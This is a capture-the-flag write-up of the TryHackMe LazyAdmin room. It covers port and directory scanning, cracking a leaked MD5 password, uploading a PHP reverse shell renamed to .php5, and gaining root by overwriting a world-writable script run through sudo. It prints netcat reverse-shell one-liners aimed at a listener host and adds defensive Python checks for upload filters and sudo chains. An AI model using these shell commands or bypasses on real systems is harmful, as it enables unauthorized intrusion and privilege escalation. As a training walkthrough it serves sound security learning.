LazyAdmin — TryHackMe WriteUp

Wilklins Nyatteng
Published in System Weakness
6 min read · Aug 30, 2023


Hello readers, welcome to the world of cybersecurity and ethical hacking! In this article we work through the LazyAdmin TryHackMe room, an ideal launchpad for honing your Linux machine exploitation skills. Designed with accessibility in mind, this room offers an excellent opportunity for beginners to delve into the fundamentals of recon, enumeration, brute-force attacks, reverse shells, and the art of privilege escalation.

I started with an Nmap scan and found 2 open ports.

└─$ nmap --min-rate 1000 10.10.216.6
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-30 12:46 EAT
Nmap scan report for 10.10.216.6
Host is up (0.33s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

I then ran a service and version scan on the open ports.

└─$ nmap -p22,80 -A 10.10.216.6
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-30 12:47 EAT
Nmap scan report for 10.10.216.6
Host is up (0.34s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I started enumerating.

HTTP (Port 80)

I accessed the IP via the browser. It was the Apache2 default page. I viewed the page source, but there was nothing interesting, and /robots.txt was unreachable.

I brute-forced directories using Gobuster.

└─$ gobuster dir -u http://10.10.216.6/ --wordlist=/usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.216.6/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/content (Status: 301) [Size: 312] [--> http://10.10.216.6/content/]
/server-status (Status: 403) [Size: 276]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================

On viewing the /content directory

I ran another directory brute force against it and found more.

└─$ gobuster dir -u http://10.10.216.6/content/ --wordlist=/usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.216.6/content/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/_themes (Status: 301) [Size: 320] [--> http://10.10.216.6/content/_themes/]
/as (Status: 301) [Size: 315] [--> http://10.10.216.6/content/as/]
/attachment (Status: 301) [Size: 323] [--> http://10.10.216.6/content/attachment/]
/images (Status: 301) [Size: 319] [--> http://10.10.216.6/content/images/]
/inc (Status: 301) [Size: 316] [--> http://10.10.216.6/content/inc/]
/js (Status: 301) [Size: 315] [--> http://10.10.216.6/content/js/]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================

I found a login page at /content/as. I did not have any credentials for it, so I moved on to look around.

I went through all the directories, and in the /content/inc directory there was an interesting file (mysql_backup). On clicking it I was able to download it to my local machine.

On checking its contents I found potential creds.

The password was an MD5 hash; on cracking it I found (Password123). I logged in using manager:P**w%$d**3 and was successful.

I checked around and got lucky on the Media Center tab, because it gave me the ability to upload files.

I jumped to PentestMonkey to get a PHP reverse shell and changed the necessary parts.

Then I uploaded it, but the upload failed. I guessed the .php extension was blocked, so I changed it to .php5:

mv php-reverse-shell.php php-reverse-shell.php5

I went to the /content/attachment/ directory and confirmed the file had been uploaded successfully.
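Why the rename worked, and what the fix looks like, as an added example (not the CMS's real upload code): a blocklist that rejects only ".php" is compared with an allowlist that admits one known-safe extension per name. The PHP_HANDLER_EXTS set reflects the FilesMatch pattern in Ubuntu's Apache PHP module config, which hands .php3/.php4/.php5/.php7/.pht/.phtml to the interpreter as well as .php; the sample file names are constructed.

```python
import posixpath

# Constructed example, not the CMS's code: a ".php"-only blocklist of the kind the
# upload form appears to use, beside an allowlist that admits one safe extension.
BLOCKED = {".php"}
ALLOWED = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}
# Extensions Ubuntu's Apache PHP module config maps to the PHP handler (the
# FilesMatch pattern ".+\.ph(p[3457]?|t|tml)$"), so blocking ".php" alone is not enough.
PHP_HANDLER_EXTS = {".php", ".php3", ".php4", ".php5", ".php7", ".pht", ".phtml"}


def _final_ext(filename: str) -> str:
    """Lower-cased final extension of the base name ("" if there is none)."""
    return posixpath.splitext(posixpath.basename(filename).lower())[1]


def blocklist_allows(filename: str) -> bool:
    """Weak check: only the final extension is compared against the blocklist."""
    return _final_ext(filename) not in BLOCKED


def allowlist_allows(filename: str) -> bool:
    """Strong check: exactly one extension, and it must be on the allowlist."""
    name = posixpath.basename(filename).lower()
    if name.startswith(".") or name.count(".") != 1:
        return False
    return _final_ext(name) in ALLOWED


def would_execute(filename: str) -> bool:
    """Would Apache run this file as PHP if it landed under the web root?"""
    return _final_ext(filename) in PHP_HANDLER_EXTS


def compare(filenames):
    """Map each name to (blocklist verdict, allowlist verdict, executes as PHP)."""
    return {f: (blocklist_allows(f), allowlist_allows(f), would_execute(f)) for f in filenames}


# Constructed sample names; the .php5 one is the rename used in this room.
SAMPLES = ["photo.jpg", "php-reverse-shell.php", "php-reverse-shell.php5",
           "shell.phtml", "shell.php.jpg", ".htaccess"]
```

Running compare(SAMPLES) shows that the blocklist accepts every sample except the bare .php file, while the allowlist accepts only photo.jpg.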

Before clicking on it I started a listener on my local machine.

On clicking the uploaded file I got a shell.

└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.18.6.139] from (UNKNOWN) [10.10.216.6] 53776
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
13:49:14 up 1:05, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

I checked which Python was available so I could upgrade to a more stable, interactive shell.

$ which python
/usr/bin/python
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@THM-Chal:/home$

I found the user.txt file in the home directory of itguy.

www-data@THM-Chal:/home$ ls
ls
itguy
www-data@THM-Chal:/home$ cd itguy
cd itguy
www-data@THM-Chal:/home/itguy$ ls
ls
Desktop Downloads Pictures Templates backup.pl mysql_login.txt
Documents Music Public Videos examples.desktop user.txt
www-data@THM-Chal:/home/itguy$ cat user.txt
cat user.txt
THM{REDACTED}
www-data@THM-Chal:/home/itguy$

It was time to escalate my privileges. I first checked what www-data could run with sudo.

www-data@THM-Chal:/home/itguy$ sudo -l
sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

On checking the contents of backup.pl, it simply runs another script, /etc/copy.sh, with sh:

www-data@THM-Chal:/home/itguy$ cat backup.pl
cat backup.pl
#!/usr/bin/perl

system("sh", "/etc/copy.sh");

I also checked copy.sh. The script opens a reverse shell to a machine on a private network (192.168.0.190, port 5554).

www-data@THM-Chal:/etc$ cat copy.sh
cat copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

I checked the permissions on copy.sh.

www-data@THM-Chal:/etc$ ls -lah copy.sh
ls -lah copy.sh
-rw-r--rwx 1 root root 81 Nov 29 2019 copy.sh
www-data@THM-Chal:/etc$

The file is world-writable (the last permission triplet is rwx), so even as www-data I had permission to read and write it, and I edited it. Since backup.pl runs copy.sh as root via sudo, whatever I put in copy.sh would run as root.
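The misconfiguration here is a chain: a NOPASSWD sudo rule runs backup.pl as root, and backup.pl hands control to a script that any user can modify. As an added example (not the room's or the author's code), the audit below follows that chain from the sudoers command, reading each text script for absolute paths it references and flagging any file that is group- or world-writable; demo() rebuilds the box's layout in a temp directory with copy.sh set to mode 0647 (-rw-r--rwx), as ls -lah showed, and runs the audit against it.

```python
import os
import re
import stat
import tempfile

# Constructed example, not the room's or the author's code: follow the scripts a
# sudo rule can reach and report any that group or other users could modify.
PATH_RE = re.compile(r"(/[\w./-]+)")

def writable_by_others(path: str) -> bool:
    """True when a group or world write bit is set (e.g. -rw-r--rwx)."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def referenced_paths(path: str) -> list[str]:
    """Absolute paths named in a text script, e.g. system("sh", "/etc/copy.sh").
    Binaries (anything containing a NUL byte) are skipped."""
    with open(path, "rb") as fh:
        data = fh.read()
    return [] if b"\0" in data else PATH_RE.findall(data.decode(errors="replace"))

def audit_sudo_command(command: str, max_depth: int = 5) -> list[str]:
    """Given the command part of a sudoers rule, return each reachable file
    that a non-root user could edit, in discovery order."""
    findings, seen = [], set()
    queue = [(tok, 0) for tok in command.split() if os.path.isfile(tok)]
    while queue:
        path, depth = queue.pop(0)
        if path in seen or depth > max_depth:
            continue
        seen.add(path)
        if writable_by_others(path):
            findings.append(path)
        queue += [(p, depth + 1) for p in referenced_paths(path) if os.path.isfile(p)]
    return findings

def demo() -> tuple[str, list[str]]:
    """Rebuild the box's layout in a temp dir: backup.pl calling a copy.sh with
    mode 0647 (-rw-r--rwx), as ls -lah showed, then audit the sudo rule."""
    tmp = tempfile.mkdtemp()
    backup, copy = os.path.join(tmp, "backup.pl"), os.path.join(tmp, "copy.sh")
    with open(copy, "w") as fh:
        fh.write("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f\n")
    os.chmod(copy, 0o647)
    with open(backup, "w") as fh:
        fh.write(f'#!/usr/bin/perl\n\nsystem("sh", "{copy}");\n')
    os.chmod(backup, 0o644)
    return copy, audit_sudo_command(f"/usr/bin/perl {backup}")
```

On a real host, run audit_sudo_command on each command listed by sudo -l; the fix for this box is chmod 755 /etc/copy.sh (and keeping root as the owner), after which demo()-style checks return nothing.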

I used the revshells generator to build a reverse-shell one-liner for this (YOUR_IP stands for the address of my listener):

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc YOUR_IP 5554 >/tmp/f

Neither vim nor nano worked in this shell, so I used the echo command to overwrite /etc/copy.sh from within /etc:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc YOUR_IP 5554 >/tmp/f" > copy.sh

I started a listener on port 5554 on my local machine.

└─$ nc -lnvp 5554
listening on [any] 5554 ...

I then ran the sudo command from the target:

sudo /usr/bin/perl /home/itguy/backup.pl

And got a root shell back on my listener.

└─$ nc -lnvp 5554
listening on [any] 5554 ...
connect to [....] from (UNKNOWN) [10.10.216.6] 33188
sh: 0: can't access tty; job control turned off
# whoami
root
root@THM-Chal:/etc# cd ~
cd ~
root@THM-Chal:~# ls
ls
root.txt
root@THM-Chal:~# cat root.txt
cat root.txt
THM{REDACTED}
root@THM-Chal:~#

About the author

Wilklins Nyatteng is a cyber security enthusiast with interest in penetration testing & vulnerability assessments, OSINT, cloud security. Certified Cyber Security professional by Trend Micro, 9x Microsoft Certified, CEH Master and AWS Solutions Architect — Associate.

Follow me on:

Twitter, LinkedIn, Github
